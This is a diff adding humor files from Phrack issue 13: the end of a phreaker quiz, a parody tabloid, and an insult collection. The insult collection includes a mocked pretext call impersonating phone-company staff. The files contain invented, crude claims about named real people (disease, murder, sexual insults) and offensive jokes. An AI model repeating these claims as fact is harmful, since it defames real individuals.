A: Push your girlfriend away and sneak out the door quietly, in hopes of
|
||||
scoring on countless hard to get goodies such as lineman's tools, test sets,
|
||||
manuals, and telephone numbers to engineer.
|
||||
|
||||
B: Give her the end of a soda bottle and tell her you'll be right back.
|
||||
|
||||
C: Ignore the silly Bell truck and continue with your date.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
2: You are in the middle of town. It is cold and raining. You have sneaked
|
||||
out of your house to the local fortress to conduct some experiments.
|
||||
When making a call to your fave LDS, you hear an MF routing! What do you do?
|
||||
|
||||
A: Continue your call as normal, making a mental note of the occurrence.
|
||||
|
||||
B: Quickly hang up and repeat the procedure in the same fashion, in hopes
|
||||
of getting the routing again, so you may memorize it and post about it.
|
||||
|
||||
C: Talk in whispers and glance over your shoulder for Bell security and FBI
|
||||
vans coming your way.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
3: You are in your school's office for disruptive behavior and notice that
|
||||
they're having some difficulties with call completion. What do you do?
|
||||
|
||||
A: You jump up and investigate the source of the problem, calling various
|
||||
test numbers while you're at it, performing a full battery of tests upon the
|
||||
line.
|
||||
|
||||
B: You grab the phone and dial the repair service, going into a long
|
||||
technical discussion on bandwidth limitation properties upon PBX type systems.
|
||||
|
||||
C: You don't give a fuck and let the bastards figure it out for themselves
|
||||
since they're the ones who are punishing you for pissing in the corner of the
|
||||
study hall.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
4: You've had a little too much to drink and aren't driving well. Suddenly,
|
||||
a telephone pole appears in front of your car. You have a head on collision.
|
||||
You feel blood dripping from the gash in your forehead. What do you do?
|
||||
|
||||
A: You climb out of your smashed car and decide to climb the pole and
|
||||
investigate the aerial distribution box for possible notes left by linemen.
|
||||
|
||||
B: You whip out your notebook and take note that there is a can up there
|
||||
and put the note away for future reference. You then go to the hospital.
|
||||
|
||||
C: You wail in dismay that you might have forgotten your new codes in the
|
||||
trauma.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
5: You are on your favorite BBS when you see some loser asking questions
|
||||
about tracing. What do you do?
|
||||
|
||||
A: You ignore the question because you're too elite.
|
||||
|
||||
B: You rag the user on every sub boaoard and in mail because ESS DOES
|
||||
trace you when you make too many calls to the same number.
|
||||
|
||||
C: You leave the user twelve pages cpied directly from a manual about
|
||||
the call trace procedure along with some personal comments on how Bell puts
|
||||
DNR's on lines if the words 'phreak', 'hack' or 'code' is spoken over it.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
6: Your mom picks up the phone during a conference and overhears someone
|
||||
harassing a DA supervisor. Later she asks you about it. What do you do?
|
||||
|
||||
A: Say 'Mom, I know you're not going to believe this, but there's a new
|
||||
company that connects you to a pre-recorded phone conversation for a nominal
|
||||
users fee.'
|
||||
|
||||
B: Say you don't know who it was but then contradict yourself later by
|
||||
talking about how neat it was to hear Pee Wee abuse a DA supervisor.
|
||||
|
||||
C: Get violently sick and leave the room.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
7: You have a little static on your telephone line. What do you do?
|
||||
|
||||
A: You call up your CO and lodge a formal complaint, branding the personnel
|
||||
as lazy, inefficient, and decadent, telling them how much of a better job a
|
||||
true telecom buff like yourself could do.
|
||||
B: Call your local tone sweep to see if Bell is tracing your line.
|
||||
|
||||
C: Hide under your bed until further notice.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
8: Your CO is having open house. You plan to go with all enthusiasm, when
|
||||
you hear that Cindy, whose body measurements are 36-24-36, is having a 20 keg
|
||||
party with no cover charge. Cindy has expressed deep lust for you within recent
|
||||
weeks. What do you do?
|
||||
|
||||
A: Telephone Cindy covertly from your CO where you are taking the tour and
|
||||
tell her you're sorry, you can't make it, but you have some great new numbers.
|
||||
|
||||
B: Dress in a ninja suit and sneak into your CO through a window.
|
||||
|
||||
C: Rush straight to Cindy's to find out that her new 6 foot 10 boyfriend
|
||||
is supervising the fun and games.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
9: You go to a shopping mall where there is a demonstration on a new AT&T
|
||||
phone. The speaker mentions telephone switching for a brief moment. What do
|
||||
you do?
|
||||
|
||||
A: Run to the nearest restroom and relieve the tension in your bladder.
|
||||
|
||||
B: Push your way to the front of the crowd of telephone illiterates and
|
||||
begin a heated debate on switching systems and analog to digital conversion.
|
||||
|
||||
C: Whip out your note pad and remove pencil from behind ear to take notes.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
10: You wake up in the morning. What do you do?
|
||||
|
||||
A: Forage into your box of trash for interesting tidbits that you may have
|
||||
missed last night.
|
||||
|
||||
B: Pick up the telephone and take reassurance that the Telco hasn't turned
|
||||
off your dial tone yet.
|
||||
|
||||
C: Admonish yourself for forgetting to set the MF routing as your alarm
|
||||
clock the night before.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
For each question that you answered A on, give yourself 5 points. For each
|
||||
B answer you gave, give yourself 3 points. For each C Answer, give yourself 1
|
||||
point. Now go back and add up your totals on your handy dandy pocket calculator
|
||||
and see how you have tested in the G.I.Q (Geek Ignorance Quotient).
|
||||
|
||||
|
||||
50 points and above- You are fucking a amazing, and not just elite, not just
|
||||
super elite, but super amazingly elite!!!! Pat yourself on the back a few hun-
|
||||
dred times, you deserve it.
|
||||
|
||||
|
||||
30 points and above- You are not quite as fucking a amazing as those in the
|
||||
above category, but you're close behind. Keep up the good work and soon you'll
|
||||
be hearing from the GIQ League!
|
||||
|
||||
|
||||
10 points and above- You are rather sad, because if you haven't realized that
|
||||
this point scoring system is inaccurate and inefficient, not to mention mathe
|
||||
matically incorrect, then you should stick to watching Scoody Doo reruns
|
||||
instead of wasting your time trying to be elite, which will never happen anyway
|
||||
to anyone who had the ingorance to put up with this worthless exam up till now.
|
||||
|
||||
|
||||
HAHAHAHAHAHAH!!!!!!! L0ZER!!! YOU JUST WASTED A GOOD PORTION OF YOUR TIME
|
||||
READING THIS, BECAUSE YOU THOUGHT IT WAS GOING 2 BE SOMETHING G00d!!!!!!!HAHA
|
||||
DAMN I'M ELITE&!$"%"C$"!$!#!3223
|
||||
|
||||
|
||||
-------------------------------------------------------------------------------
|
170
phrack13/8.txt
Normal file
170
phrack13/8.txt
Normal file
|
@ -0,0 +1,170 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #8 of 10
|
||||
|
||||
%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
|
||||
% + + %
|
||||
% Phrack Presents... %
|
||||
% %
|
||||
* Computerists Underground News-Tabloid *
|
||||
% By Crimson Death %
|
||||
% %
|
||||
% + + %
|
||||
%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
|
||||
|
||||
Welcome to the first issue of Computerist's Underground News-Tabloid. Now,
|
||||
I am sure you are thinking, "aren't 'news' and tabloid basically synonymous?
|
||||
Isn't that a bit redundant?". Hell, YES! It is! But "we" don't care. Names
|
||||
don't mean a DAMNED thing to us! Hell, NO! What we care about it NEEEEWS! Hard-
|
||||
core, FACTUAL news. That's why we tell it like it is. All Bullsh-t aside. You
|
||||
don't like what you're seeing? Don't read it! These are the "Bob"-damned facts,
|
||||
buddy. This is a tough world we live in. Things aren't always as pretty as we'd
|
||||
like them to be. It's a Dog-Eat-Dog world. If you can't take it, you won't make
|
||||
it, and it's as simple as that. So read and learn! It's OUR world, and only WE
|
||||
can change it, so keep informed!
|
||||
|
||||
Editor-in-Chief
|
||||
Crimson Death
|
||||
-------------------------------------------------------------------------------
|
||||
DREADFUL DIGITAL DILEMA
|
||||
|
||||
"IT'S TRUE!", say top scientists at South Hampton Institute of Technology,
|
||||
"Within three years, the world will face its worst dilema in ages." A new
|
||||
strain of virus called C-AIDS (Computer/Artifical Intelligence Deficiency
|
||||
System) will begin attacking micro-chips around the globe.
|
||||
Where is it coming from? Scientists aren't quite sure, but believe it to
|
||||
be a combination of many industrial waste products that float around in the
|
||||
air, and human virus! How can this be? Well, that is uncertain right now.
|
||||
Dr. Harry Koch claims, "We just don't know, but it's comming!" Religious
|
||||
groups claim it's a sign from God to "slow down". Our resident psychic believes
|
||||
it's a plague sent down by aliens to hinder us in catching up to their
|
||||
technology.
|
||||
Just what will this mean? The downfall of many businesses, government
|
||||
problems, stock market crash, media troubles! You name it! Almost everything is
|
||||
run by computers these days. The world will be in shambles. Barbarian times
|
||||
will set in! People will start using their minds! Something needs to be
|
||||
done, and QUICK!
|
||||
-------------------------------------------------------------------------------
|
||||
QUICK QUOTES
|
||||
|
||||
"IT'S TRUE," says:
|
||||
|
||||
Line Breaker, "I ran a Commodore 64 BBS with 100 megabytes of storage!"
|
||||
American Telephone and Telegraph, "Our rates really ARE the cheapest!"
|
||||
The Traveller, "My Jackin Box plans work! You just play with the little lever
|
||||
until it pops up!"
|
||||
Cheshire Catalyst, "I did play Shaggy on Scooby Doo...but, hey, that's all in
|
||||
the past now!"
|
||||
-------------------------------------------------------------------------------
|
||||
ROBOT CLONE SEEKS PHREAKS AND TRACKS HACKS
|
||||
|
||||
"IT'S TRUE!", say our inside sources, "Bell Telephone Labs is currently
|
||||
working on a high tech robot to seek out Phone Phreaks and Hackers. I have seen
|
||||
one...they're almost life like, and it's scary!"
|
||||
Right now, there are only a few, but BTL plans to soon put them into mass
|
||||
production. This means Bulletin Board Systems throughout the U.S. will be
|
||||
teeming with these undercover agents. Two known NERD's (Neurologically
|
||||
Enhanced Robotic Detectives) are John Maxfield, a Detroit based android running
|
||||
a business called Board Scan; and Daniel Pasquale, a former officer of the law,
|
||||
located in California.
|
||||
How can we protect ourselves? Well, we're not quite sure, but our
|
||||
resident scientists are working on it now!
|
||||
More on this topic as it unfolds.
|
||||
-------------------------------------------------------------------------------
|
||||
Latest news on Robot Clones: Rumor has it that N.E.R.D., John Maxfield
|
||||
has contracted a premature case of C-AIDS. If asked, he only denies, but an
|
||||
inside agent of ours at BTL said that he has been coming there for treatments.
|
||||
-------------------------------------------------------------------------------
|
||||
FAMED PHREAK FATHERED BY FUZZIES
|
||||
|
||||
"IT'S TRUE!", says a close friend of Scott Ellentuch (better known as
|
||||
Tuc) the sysop of RACS-III BBS, and former co-editor of Tap Magazine. "He
|
||||
doesn't like to talk about it, but he was infact raised by a pack of male
|
||||
Guinea Pigs!"
|
||||
At the tender age of three months old, the sibling Tuc was abandoned on
|
||||
a doorstep in Manhattan. Unfortunately for the tot, the owner of the house was
|
||||
an old druken man, who threw the poor baby into the trash before his wife got
|
||||
home and found it. Luckily, a pack of wandering Guinea Pigs were on the hunt
|
||||
for food, an happened upon the child. They then took him to their nesting in
|
||||
Central Park, and raised him like one of their own.
|
||||
One day, at the age of 10, Tuc was apprehended by the police after being
|
||||
caught shopplifting a bag of cedar chips at a local pet shop. It was decided
|
||||
in court that he was a not a criminal, but just misguided because of his fate.
|
||||
He was then put in an adoption home until taken in by the Ellentuch's.
|
||||
A crack reporter of ours decided to seek out these kindly rodents, and
|
||||
ask about any grievances they may have about little "Zippy" (the name given
|
||||
to him by his furry brothers). When questioned, they only replied with a
|
||||
squeek, and left a few dung pellets. I suppose that's their way of saying,
|
||||
"Come on back, Zip, we miss ya..."
|
||||
-------------------------------------------------------------------------------
|
||||
NEW PHREAK KLASS CO-SYSOPED BY DEMON FROM HELL
|
||||
|
||||
"IT'S TRUE!", says respected Demonologist, Dr. Jack Goff, from Hawaii
|
||||
State University, founder of the Academy of Supernatural Studies. "A modem
|
||||
user, who dons the handle 'The Executioner' has been possessed by an evil
|
||||
demon from the netherworld!"
|
||||
The Executioner, of New Jersey State, co-sysop of the revived Phreak
|
||||
Klass 2600 (ran by The Egyptian Lover), and the 'Leader' of the also-revived
|
||||
PhoneLine Phantoms, was "once a nice person", according to many of his old
|
||||
friends. What caused his plunge into the sadistic-egotistical world he now
|
||||
lives in? Black magick!
|
||||
His mother spoke with us. "Ever since he ate that bad can of Spaghettios,
|
||||
you know...the ones with the sliced franks, he hasn't been the same.
|
||||
Day-by-day, he gets worse-and-worse. It's like living with...a...a...monster!"
|
||||
At that point, the poor woman broke into tears. But, she couldn't have been
|
||||
more on the money if she were sitting on it! The truth is, while eating a plate
|
||||
of those Spaghettios (you know, the one's with the sliced franks in them),
|
||||
he was reading out of a book he bought the week before called "101 Ways to
|
||||
Summon a Demon". Thinking it was all a bunch of nonsense, he read one of the
|
||||
'prayers' aloud. From then on, the poor boy has been inhabited by the demon,
|
||||
Isuzu.
|
||||
Sorry to say, Dr. Goff claims this demon is a "one of a kind". So far,
|
||||
there are no known ways to Ex-orcise (pun intended) the dreaded Isuzu. "It's
|
||||
a shame for the lad...I guess we will have to put up with his sadistic, ego-
|
||||
tistical, obnoxious, rude, loud, ragging posts and attitudes for awhile."
|
||||
-------------------------------------------------------------------------------
|
||||
SCIENTIFIC STUDIES SHOW...
|
||||
|
||||
If you put an infinate number of Taran King's in a room for an infinate
|
||||
number of years, you probably still couldn't get Metal Shop Private to stay up
|
||||
for over 30 days.
|
||||
-------------------------------------------------------------------------------
|
||||
LOD/H MEMBER DISMEMBERS MEMBERS
|
||||
|
||||
"IT'S TRUE!" says an anonymous member of the 'Modem World', "Until now,
|
||||
it has been all hush-hush, but in reality, there are only a couple LOD/H
|
||||
members alive today...it's frightening, and it's hard to believe, yet it
|
||||
happened."
|
||||
Just what did happen you ask? What is the truth behind the drop-out of
|
||||
many LODers? How come the group has dwindled to a petty few? Murder! Yes, cold-
|
||||
blooded throat-slashing MURDER! "Who? How? Why? ", you say? Well, that's what I
|
||||
am here for, and that's what you're going to find out.
|
||||
In December of '86, an LOD/H meeting was held at The Mariott, in
|
||||
Philadelphia, in which all of the members had attended. During a discussion on
|
||||
the current MCI cracked-down, someone said, "Hey, let's pause this conver-
|
||||
sation for 30 minutes, 'Punky Brewster' is coming on." It was at this point
|
||||
that everyone in the room quieted, and The Videosmith stood up and threw a
|
||||
glass of Pink Lemonade at the TV. He then ran out of the room yelling "Fuck
|
||||
this shit! It all makes my balls itch!" Moments later he returned with a 17
|
||||
inch machete, and a can of Raid. He had shaved his head, and was wearing a
|
||||
shirt that said, "Buckwheat say 'Drugs NOT O-Tay!'" He was obviously deranged.
|
||||
He proceded to spray everyone's hair with raid, until the can finally
|
||||
ran out. As the group stood in awe, he slashed all of them into tiny bite-
|
||||
size pieces...one by one. He then sat down, and watched the rest of Punky
|
||||
Brewster, and to this day, has no recollection of what had happened. Only
|
||||
those few, who had been at Denny's at the time, remained.
|
||||
Following this massacre, he was treated at the Jason Voorhees Institute
|
||||
for the Criminaly Insane, and is no longer a member of LOD/H.
|
||||
-------------------------------------------------------------------------------
|
||||
Well, that about raps it up for the first issue of the Tabloid. There may
|
||||
be a few more in the future, I am not sure at this point right now. I hope you
|
||||
all enjoyed it, and that only AT&T, The Traveller, and Line Breaker were of-
|
||||
fended.
|
||||
I'd like to have some comments on how you felt about it, so let me know.
|
||||
Also, let me know if you figured out all of the puns and acronyms.
|
||||
-------------------------------------------------------------------------------
|
||||
Call these Awesome Boards:
|
||||
|
||||
Lou's RBBS.................215-462-4335 Sysop: Louis Acok
|
||||
Grendel's Liar (sic).......415-679-2600 Sysop: Stan the Man
|
||||
KKK-Kool BBS...............404-343-5397 Sysop: Kurt Waldheim
|
423
phrack13/9.txt
Normal file
423
phrack13/9.txt
Normal file
|
@ -0,0 +1,423 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #9 of 10
|
||||
|
||||
[+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+]
|
||||
||-----------------------------------------------------||
|
||||
|| ||
|
||||
|| ______The Executioner______ ||
|
||||
|| PHRACK XIII| |PHRACK XIII ||
|
||||
|| ------------ Thanks: Knight Lightning ------------ ||
|
||||
|| |PHRACK INC| The Phreakazoid! |PHRACK INC| ||
|
||||
|| --------------------------------------------------- ||
|
||||
|| | | ||
|
||||
|| | Phreak Klass |The Best of Sexy-Exy| Phreak Klass| ||
|
||||
|| | 806-799-0016 |--------------------| 806-799-0016| ||
|
||||
|| | EDUCATE |(c) 1987 Sexy-Exy TM| EDUCATE | ||
|
||||
|| | | | | ||
|
||||
|| | | Released April 1 | | ||
|
||||
|| | | ||
|
||||
|| --------------------------------------------------- ||
|
||||
[+]]]]]]]]]]]]]]]]]]]]]]]]]]RAG[[[[[[[[[[[[[[[[[[[[[[[[[[+]
|
||||
|
||||
Welcome to "The Best of Sexy-Exy", a conglomoration of
|
||||
rags/insults that have been gathered over the past year or
|
||||
so. All rags are original and are the creation of my genius
|
||||
mind. I think that this installment is appropriate for the
|
||||
13th issue of PHRACK.
|
||||
|
||||
NO rags are to be taken seriously, they are merely for
|
||||
entertainment.
|
||||
|
||||
There have been events beyond my control during the
|
||||
process of writing this file, they are enclosed in "**".
|
||||
Thank you.
|
||||
|
||||
============================================================
|
||||
"Doc Holiday: The man, The myth, The Loze"
|
||||
Doc Holiday is a man of many diverse talents. I think it's
|
||||
my place to let the whole world know just how much of a
|
||||
mental giant he is.
|
||||
|
||||
------------------------------------------------------------
|
||||
First, let's discuss how he manages to engineer the toughest
|
||||
of AT&T's network men. Here is a typical conversation
|
||||
between Doc and AT&T. I will interject my comments in
|
||||
between the brackets [ and ]. Doc will be represented by a
|
||||
DH.
|
||||
<RING>
|
||||
AT&T: Hello, AT&T directory assistance, may I help you?
|
||||
[Boy, this guy is a REAL powerhouse to engineer,
|
||||
think MAYBE Doc will be able to get anything from
|
||||
him?]
|
||||
DH: Hi, this is Pee Wee Herman from Illiois Bell, DA waste
|
||||
removal. I am having a problem connecting an inter-
|
||||
office call, do you think you could give me the number
|
||||
to the SCC in area code 201?
|
||||
[Gee, he picked a REAL important reason to call didn't
|
||||
he?]
|
||||
AT&T: Well, sir, I don't think I can do that, I can give
|
||||
you the number for the business office, maybe they can
|
||||
help you. (AT&T thinks: bahehahhe, stupid kid).
|
||||
<RING>
|
||||
NJ BELL: Hello, New Jersey Bell, all operaters are busy now,
|
||||
please hold, and your call will taken in turn.
|
||||
DH: Ho hum...[unzips his pants]
|
||||
NJ BELL: [Elevator music]
|
||||
DH: ahhhhh...[Doc, why is your left hand having spasms?]
|
||||
NJ BELL: Hello, New Jersey Bell, this is Susan.
|
||||
DH: Uh, yeah, hold on a sec...[wiping away the fluid from
|
||||
reciever.]
|
||||
DH: Uh yeah, this is Dick Little, from Illinois Bell, I was
|
||||
wondering if you could give me your 201 CN/A?
|
||||
[Uh, Doc, hate to break this to you, but 201 has
|
||||
no CN/A.]
|
||||
NJ BELL: Uh yeah, hold on...
|
||||
[NJ BELL: Must be one of those trainees, they have
|
||||
to get because of affirmative action.]
|
||||
NJ BELL: I'm sorry, I can't give you that number.
|
||||
DH: Well, here in this small town, it's kinda hard to get
|
||||
around, so could you please give me someone I can refer
|
||||
to?
|
||||
[At this time, Doc's dog wanders into his room, and
|
||||
begins to bark and snarl and generally acts like
|
||||
Doc's mom.]
|
||||
DH: Uh, y'know, this town is SO small, you can hear the dog
|
||||
barking across the street. [Wow, fast thinker]
|
||||
DH: I'm not used to this small town, I'm used to a big city.
|
||||
NJ BELL: Oh, what town are you in?
|
||||
DH: Uh, it's this little town outside Illinois.
|
||||
[Hmm, he's supposed to be from Illinois Bell but he is
|
||||
not in Illinois? WHAT AN ENGINEER!!!]
|
||||
NJ BELL: Oh, is that so. [NJ BELL: Damn kid should at least
|
||||
know his geography.]
|
||||
NJ BELL: What big city did you live in before?
|
||||
DH: Oh, I used to live in New York City.
|
||||
[Sure, Doc, you got your MASSIVE southern drawl in the
|
||||
boro of Brooklyn...]
|
||||
DH: I mean, uh, I only lived there for 3 months.
|
||||
[Give up Doc, you screwed up big time, you're gonna
|
||||
get pounded.]
|
||||
[FLASH: Doc's mom gets on the phone.]
|
||||
Doc's Mom: ROB, TIME FOR YOU CELLO LESSON!!!!
|
||||
DH: Yeah, uh, well, my seceratary, has just reminded me that
|
||||
I have to pick up my kid for his music lesson.
|
||||
NJ BELL: <chuckle> Sure, <growing giggle> I guess I will
|
||||
talk to you later <crescending into hysterical
|
||||
laughter, falling off his chair in a spasmodic
|
||||
echo of immense laughter>.
|
||||
<CLICK>
|
||||
Boy, Doc, I gotta hand it to you, in that conversation, you
|
||||
sure showed him your intellegence. It's ok, that you don't
|
||||
know where you are, and it's ok that your mom interrupted
|
||||
you twice, barking both times into the phone. But, hey,
|
||||
I am not done celebrating you yet, here's more of "The Story
|
||||
Of Your Life!"...
|
||||
** The date is now March 14, Doc Holiday has just been put
|
||||
out of action by Oryan QUEST, shutting off both of Doc's
|
||||
lines. **
|
||||
** The date is March 30, I have just heard that Doc has been
|
||||
busted for COSMOS hacking. **
|
||||
------------------------------------------------------------
|
||||
TOK, Tribunal of Knowledge, is a group to be admired,
|
||||
they're conglomoration of massive intellegence and
|
||||
normality have all of the phreak/hack world stunned.
|
||||
Prophet's education at Devry Tech, you know the school where
|
||||
you get a free box of tools when you enter, is a definate
|
||||
school for those who have superior mental ability. And then
|
||||
there's Solid State, or by name, Nate. By the way, do you
|
||||
know what the name Nate means? Let's look in the Websters
|
||||
Collegiate Doctionary...
|
||||
NATE \NAT\ n : skin that stretches from the base of the
|
||||
scrotum to the opening of the anal cavity.
|
||||
Boy, Nate, your parents must have loved you...
|
||||
And I haven't forgotten you, High Evolutionary, you massive
|
||||
stud you. HE, is on the school football team. [Actually, he
|
||||
plays text-graphics football on his commodore and thinks he
|
||||
plays football, but we'll let him have his fantasy.]
|
||||
Here is my tribute to T0K!1!
|
||||
TOK! Second Chapter: Nothing this bad ever dies.
|
||||
------------------------------------------------
|
||||
We're TOK and we're proud to say,
|
||||
Even Buckwheat says that we're O'Tay!
|
||||
We're gonna make LOD jealous of us,
|
||||
With our computers we get from Toys R Us!
|
||||
We'll take the hack world by attack,
|
||||
With our 100+ files we put in Phrack.
|
||||
Our reformed group numbers only to three,
|
||||
We'll be famous like Larry, Moe and Cur-ly!
|
||||
Hey TK do a prophile on us, we want some press,
|
||||
We'll tell ya about our hobbies like playing Phone chess!
|
||||
Ask us about our ability and we'll gladly exposulate,
|
||||
About the great acomplishments of Solid State!
|
||||
And Prophet too, boy is he a Joe Hacker,
|
||||
He talks to Bill Landreth, aka The Cracker.
|
||||
He spits out logins and passwords all the time,
|
||||
Getting busted by feds is his favorite past time.
|
||||
Then there's High Evolutionary, the leader of the pack,
|
||||
Who does his hacking in a neighbor's tool shack.
|
||||
He likes to hack Unix's, VMS and The Source,
|
||||
He likes to play football, on his computer of course.
|
||||
We're elite, we're the best there will ever be,
|
||||
We're just jealous that we're not in cDc.
|
||||
** The date is now March 21, I have just learned that Evil
|
||||
Jay and Ctrl-C have been added to the list of TOK
|
||||
groupies.**
|
||||
------------------------------------------------------------
|
||||
Dr. Doom Rag, the extended dance version to the tune of
|
||||
"Beverly Hillbillies".
|
||||
Now, listen to a story about a boy named Doom,
|
||||
Poor modem geek who would never leave his room.
|
||||
Then one day he was talking on the phone,
|
||||
When up in his pants came a miniature bone.
|
||||
Penis, that is, kinda like a toothpick.
|
||||
Well the next thing you know ol' Doom puts up a board
|
||||
He runs it on a Commie 'cause it's all he can afford.
|
||||
He makes his board private and he thinks he is a phreak,
|
||||
<Idea Block...sorry>
|
||||
------------------------------------------------------------
|
||||
I have seen alot of files written lately and needless
|
||||
to say, alot of them need a lot of work. Sooo in my infinite
|
||||
charitableness, I ha ve decided to write a file on how to
|
||||
write a file. I will list EVERY IMPORTANT aspect of writing
|
||||
a file and all the inside secrets on how it will make you
|
||||
look a like a real cool dude (Let's face it, we write files
|
||||
to promote ourselves.).
|
||||
The first and most important thing to writing a file is
|
||||
your border. It has to be flashy and must include the name
|
||||
of your k-kool group which you are part of even though no
|
||||
one in the group helped you but you will still put their
|
||||
name down to promot e yourselves. Of course, the title must
|
||||
be set in it's
|
||||
own section of the border.
|
||||
Example
|
||||
-------
|
||||
[$%$]\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\[$%$]
|
||||
\===/ \===/
|
||||
[+] Metro! =->Dr. Doom<-= Metro! [+]
|
||||
$$$ ------ -------- ------ $$$
|
||||
%^% (^name of group) (name must be %^%
|
||||
(0) emphasized) (0)
|
||||
*#* *#*
|
||||
RAD Present: RAD
|
||||
|+|(always use 'present') |+|
|
||||
::: :::
|
||||
@!@ File #30 > ISDN!!!!!!!!!!! @!@
|
||||
%!% %!%
|
||||
%!% (ALWAYS say how many OTHER worthless files %!%
|
||||
%%% you have written so it makes you look %%%
|
||||
||| productive) |||
|
||||
[$%$]//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//[$%$]
|
||||
That is an example of a good border, notice all
|
||||
the neat ASCII graphics and how he uses space to put
|
||||
his group in the file too.
|
||||
The content of your file is important also.
|
||||
Here is a list of rules you should follow.
|
||||
1. ALWAYS be confusing, it makes you look li ke you
|
||||
know what you are talking about, even if you don't.
|
||||
2. ALWAYS use as many acronyms as you can, it will make
|
||||
your reader look up to you because you know that
|
||||
AACTU stands for Acronyms Are Cool To Use.
|
||||
3. ALW AYS be condescending to your reader as if he/she
|
||||
should know what the hell you are talking about even
|
||||
if you are just rambling to fill space.
|
||||
Corollary: ALL FILES SHOULD BE AT LEAST 40 SECTORS
|
||||
4. ALWAYS give 10-15 examples that really don't show
|
||||
what you are talking about, but will make the reader
|
||||
think that whatever you are writing on, somehow has
|
||||
some use when it doesn't.
|
||||
5. ALWAYS put in diagrams and pictures, the ASCII will
|
||||
confuse them so much that you can say just about
|
||||
anything that will describe the diagram.
|
||||
6. ALWAYS list things vertically, it makes you look
|
||||
professional. (And it takes up space too)
|
||||
7. ALWAYS thank 10 famous people even if they didn't
|
||||
help you on the file because it will make it seem
|
||||
as if you know them REAL well.
|
||||
8. ALWAYS interject your own opinions because it makes
|
||||
you look scholarly and that you are a master of the
|
||||
facts you are perpetrating.
|
||||
9. ALWAYS make at least 5 spelling mistakes, because it
|
||||
makes it seem as if you did it in a hurry because
|
||||
you have a social life, even when you don't and
|
||||
spent days on it correcting spelling and grammar.
|
||||
10. ALWAYS type stuff like jkwhebfiue in parts you don't
|
||||
fully understand and then blame it on the xmission.
|
||||
This releases you from knowing everything in the
|
||||
file.
|
||||
11. ALWAYS dedicate your file to a girlfriend, it makes
|
||||
you look like you have one and that you are a stud,
|
||||
even if you look like Slave Driver.
|
||||
|
||||
Sexy-Exy presents...
|
||||
|
||||
A Humor Filled Article
|
||||
|
||||
A Marvelous Laugh For The 80's
|
||||
A Nice Bedtime Story
|
||||
A Stephen King Look-a-Like
|
||||
A Joke for You!
|
||||
"When a Phreak/Hacker says...He really means,,,"
|
||||
|
||||
Preface
|
||||
=======
|
||||
Just a note, all names mentioned are fictitous, and are
|
||||
creations of the author. Any resemblences or factual
|
||||
similiarity are completely coincidental.
|
||||
When a Phone Phreak or Hacker says something, there is
|
||||
usually an undertone or subliminal message, in this nice
|
||||
file, I will list some of the more common ones you will run
|
||||
across.
|
||||
1. When Slave Driver says
|
||||
'I am on the football team!'
|
||||
He really means...
|
||||
'I wash the uniforms for the guys.
|
||||
2. When Carrier Culprit says...
|
||||
'I look like Don Johnson!'
|
||||
He really means...
|
||||
He watches too much 'Miami Vice'.
|
||||
3. When Knight Lightning says...
|
||||
'Hi this is KL, I wanna ask you something...'
|
||||
He really means...
|
||||
'Hi, this is KL, let me open up my Database.'
|
||||
4. When Phantom Phreaker says...
|
||||
'I go trashing for all my information.'
|
||||
He really means...
|
||||
'I am going to shop for Christmas dinner.'
|
||||
5. When Dr. Doom says...
|
||||
'I got locked out of my house.'
|
||||
He really means...
|
||||
'The Dept. of Sanitation put the lid back on the sewer'
|
||||
5. When Forest Ranger says...
|
||||
'I am tenderizing meat.'
|
||||
He really means...
|
||||
'I am popping my zits.'
|
||||
6. When Line Breaker says...
|
||||
ANYTHING
|
||||
He really means...
|
||||
'I am lying to cover my stupidity.'
|
||||
7. When Silver Spy says...
|
||||
'I am God at the VAX/VMS.
|
||||
He really means...
|
||||
'I work with a VAX, so I am not that impressive.'
|
||||
8. When Evil Jay says...
|
||||
'I am into Heavy Metal.'
|
||||
He really means...
|
||||
'I have no friends and bang my head in frustration.'
|
||||
9. When The Rocker says...
|
||||
'I love to party.'
|
||||
He really means...
|
||||
He watches Animal House and thinks he can party.
|
||||
10. When Mark Tabas says...
|
||||
'I have an athletic family.'
|
||||
He really means...
|
||||
'Me and my little girlfriend are running
|
||||
away from EVERYBODY.
|
||||
11. When Captain Hooke (Howie) says...
|
||||
'Hey man, I am gonna fuck up your dad's credit card on
|
||||
TRW!'
|
||||
He really means...
|
||||
'I spend too much time talking to Line Breaker.'
|
||||
12. When Captain Hooke (Howie) says...
|
||||
'I have a major social life.'
|
||||
He really means...
|
||||
'I call up the conference bridges and spend all of
|
||||
my time talking to losers.'
|
||||
13. When Dr. Who says...
|
||||
'I have done alot for the Phreak/Hack world.'
|
||||
He really means...
|
||||
'I try everything first to see if it's safe.'
|
||||
14. When Forest Ranger says...
|
||||
'Telecomputist will be an original magazine full of
|
||||
new information.
|
||||
He really means...
|
||||
'Telecomputist is written on toilet paper with
|
||||
the same quality and originality of articles'
|
||||
16. When Attila the Hun says...
|
||||
'I love to Slam Dance!'
|
||||
He really means...
|
||||
'When he's in a ballroom he steps on EVERYONE'S feet.'
|
||||
17. When Ax Murderer says...
|
||||
'Yo, I just wrote the most complete file on UNIX with
|
||||
examples.'
|
||||
He really means...
|
||||
'I rewrote a Unix manual and copied the illustrations
|
||||
too.'
|
||||
18. When Taran King says...
|
||||
'Yo, MSP is down due to Hard disk problems.'
|
||||
He really means...
|
||||
'I spilled dinner over the computer chatting with KL.'
|
||||
19. When Sinister Fog says...
|
||||
'I used to run the best bbs in the country.'
|
||||
He really means...
|
||||
'We tried to find the non-existant alogarithm for SPC.'
|
||||
